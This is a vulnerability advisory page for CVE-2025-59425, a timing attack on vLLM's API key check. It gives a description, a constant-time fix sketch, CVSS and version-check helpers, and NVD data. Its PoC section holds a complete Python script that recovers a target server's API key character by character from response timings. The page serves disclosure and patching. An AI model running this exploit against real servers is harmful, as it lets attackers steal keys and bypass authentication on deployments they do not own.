CVE-2025-59425

Description

vLLM is an inference and serving engine for large language models (LLMs). Before version 0.11.0rc2, vLLM's built-in API key validation was vulnerable to a timing attack. The validation used an ordinary string comparison, which takes longer the more leading characters of the supplied API key are correct. By statistically analyzing response times across many attempts, an attacker could determine when a guess matches the next character of the key and so recover the key one character at a time. Deployments that rely on vLLM's built-in API key validation are therefore vulnerable to authentication bypass. Version 0.11.0rc2 fixes the issue.
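
The general mitigation for this class of flaw (CWE-385) is a comparison whose running time does not depend on how many characters match. The following is a minimal sketch of that idea using Python's standard library. It is not the vLLM patch itself, and the function name `is_valid_api_key` is hypothetical; see the patch commit in the references for the actual change.

```python
import hashlib
import hmac


def is_valid_api_key(provided: str, expected: str) -> bool:
    """Compare two API keys without leaking the position of the first mismatch.

    Hypothetical helper for illustration only; not taken from vLLM.
    """
    # Hash both values first so the compared byte strings always have the
    # same length, regardless of what the client sent.
    provided_digest = hashlib.sha256(provided.encode("utf-8")).digest()
    expected_digest = hashlib.sha256(expected.encode("utf-8")).digest()
    # hmac.compare_digest is designed to take time independent of where the
    # inputs differ, unlike the == operator on strings.
    return hmac.compare_digest(provided_digest, expected_digest)
```

Hashing before comparing is a design choice rather than a requirement: `hmac.compare_digest` alone already avoids the early exit, and the hash additionally keeps the length of the expected key from influencing the comparison.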

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
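
As a cross-check, the 7.5 base score can be reproduced from the vector with the CVSS v3.1 base score equations. The sketch below is an illustration, not an official calculator: it handles only vectors with Scope: Unchanged (as in this CVE), and the function names are hypothetical. The metric weights are those published in the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place as defined in the CVSS v3.1 spec."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def cvss31_scores(vector: str):
    """Return (base, exploitability, impact) for a Scope: Unchanged vector."""
    # Skip the leading "CVSS:3.1" element, then split "AV:N" into key/value.
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    if parts["S"] != "U":
        raise ValueError("this sketch only supports Scope: Unchanged")
    w = {name: WEIGHTS[name][parts[name]] for name in WEIGHTS}
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    base = 0.0 if impact <= 0 else roundup(min(impact + exploitability, 10))
    return base, round(exploitability, 1), round(impact, 1)


scores = cvss31_scores("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N")
print(scores)
```

For this vector the three values agree with the `baseScore`, `exploitabilityScore`, and `impactScore` fields in the raw JSON data.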

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* (versions before 0.11.0) - VULNERABLE

cpe:2.3:a:vllm:vllm:0.11.0:rc1:*:*:*:*:*:* - VULNERABLE

vLLM < 0.11.0rc2
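
To check whether a given vLLM version string falls in the affected range, a comparison along the following lines can be used. This is a simplified sketch under stated assumptions: it understands only `X.Y.Z` release numbers with an optional `rcN` suffix, ignores anything after that (such as `.dev` or `+local` suffixes), and the helper names are hypothetical. A full PEP 440 parser is more robust for unusual version strings.

```python
import re

FIXED_VERSION = "0.11.0rc2"  # first fixed version according to the advisory


def parse_version(version: str):
    """Turn 'X.Y.Z' or 'X.Y.ZrcN' into a sortable tuple (simplified)."""
    match = re.match(r"^(\d+(?:\.\d+)*)(?:rc(\d+))?", version.strip())
    if not match:
        raise ValueError(f"unrecognized version string: {version!r}")
    release = tuple(int(part) for part in match.group(1).split("."))
    # Pad so that '0.11' and '0.11.0' compare as equal.
    release = release + (0,) * (4 - len(release))
    # A final release sorts after every release candidate of the same number.
    rc = int(match.group(2)) if match.group(2) is not None else float("inf")
    return release, rc


def is_affected(version: str) -> bool:
    """True if the version is earlier than the first fixed version."""
    return parse_version(version) < parse_version(FIXED_VERSION)


for candidate in ("0.10.2", "0.11.0rc1", "0.11.0rc2", "0.11.0"):
    print(candidate, "affected" if is_affected(candidate) else "not affected")
```

The version string of an installed package can be obtained with `importlib.metadata.version("vllm")` and passed to `is_affected`.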

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-59425 PoC - vLLM API Key Timing Attack
# This PoC demonstrates how to exploit the timing attack vulnerability
# in vLLM's API key validation to bypass authentication.

import requests
import time
import statistics
from concurrent.futures import ThreadPoolExecutor

TARGET_URL = "http://target-vllm-server:8000/v1/models"
API_KEY_LENGTH = 32  # Adjust based on target's key length
CHARSET = "abcdef0123456789"
SAMPLES_PER_CHAR = 50

def measure_response_time(headers):
    """Measure HTTP response time for a given set of headers."""
    times = []
    for _ in range(SAMPLES_PER_CHAR):
        start = time.perf_counter_ns()
        try:
            response = requests.get(TARGET_URL, headers=headers, timeout=5)
        except requests.exceptions.RequestException:
            continue
        end = time.perf_counter_ns()
        times.append(end - start)
    return statistics.median(times) if times else float('inf')

def test_key_prefix(prefix, char):
    """Test if appending a character to the prefix yields a longer response time."""
    test_key = prefix + char + "a" * (API_KEY_LENGTH - len(prefix) - 1)
    headers = {"Authorization": f"Bearer {test_key}"}
    return char, measure_response_time(headers)

def timing_attack():
    """Perform timing attack to recover the API key character by character."""
    discovered_key = ""
    
    for position in range(API_KEY_LENGTH):
        print(f"[*] Discovering character at position {position}...")
        
        with ThreadPoolExecutor(max_workers=len(CHARSET)) as executor:
            futures = [
                executor.submit(test_key_prefix, discovered_key, char)
                for char in CHARSET
            ]
            results = [f.result() for f in futures]
        
        # The character with the longest response time is likely correct
        results.sort(key=lambda x: x[1], reverse=True)
        best_char, best_time = results[0]
        second_best_time = results[1][1]
        
        # Verify with a threshold (timing difference should be noticeable)
        if best_time - second_best_time > 1000:  # nanoseconds threshold
            discovered_key += best_char
            print(f"[+] Found character: {best_char} (key so far: {discovered_key})")
        else:
            print(f"[-] Could not determine character at position {position}")
            break
    
    return discovered_key

if __name__ == "__main__":
    print(f"[*] Starting timing attack against {TARGET_URL}")
    api_key = timing_attack()
    print(f"\n[+] Recovered API key: {api_key}")
    
    # Verify the recovered key
    headers = {"Authorization": f"Bearer {api_key}"}
    response = requests.get(TARGET_URL, headers=headers)
    print(f"[*] Verification status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59425
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59425
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59425/
[4] VulDB https://vuldb.com/cve/CVE-2025-59425
[5] GitHub (affected code) https://github.com/vllm-project/vllm/blob/4b946d693e0af15740e9ca9c0e059d5f333b1083/vllm/entrypoints/openai/api_server.py#L1270-L1274
[6] GitHub (patch commit) https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48
[7] GitHub (release notes) https://github.com/vllm-project/vllm/releases/tag/v0.11.0
[8] GitHub (vendor advisory) https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59425", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:38.950", "lastModified": "2025-10-16T18:02:09.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). Before version 0.11.0rc2, the API key support in vLLM performs validation using a method that was vulnerable to a timing attack. API key validation uses a string comparison that takes longer the more characters the provided API key gets correct. Data analysis across many attempts could allow an attacker to determine when it finds the next correct character in the key sequence. Deployments relying on vLLM's built-in API key validation are vulnerable to authentication bypass using this technique. Version 0.11.0rc2 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-385"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.11.0", "matchCriteriaId": "99A24E23-769D-4DB8-BF37-EEC71EE83630"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "46639D64-5C28-44F3-AE25-9212114AFC8E"}]}]}], "references": [{"url": 
"https://github.com/vllm-project/vllm/blob/4b946d693e0af15740e9ca9c0e059d5f333b1083/vllm/entrypoints/openai/api_server.py#L1270-L1274", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/releases/tag/v0.11.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}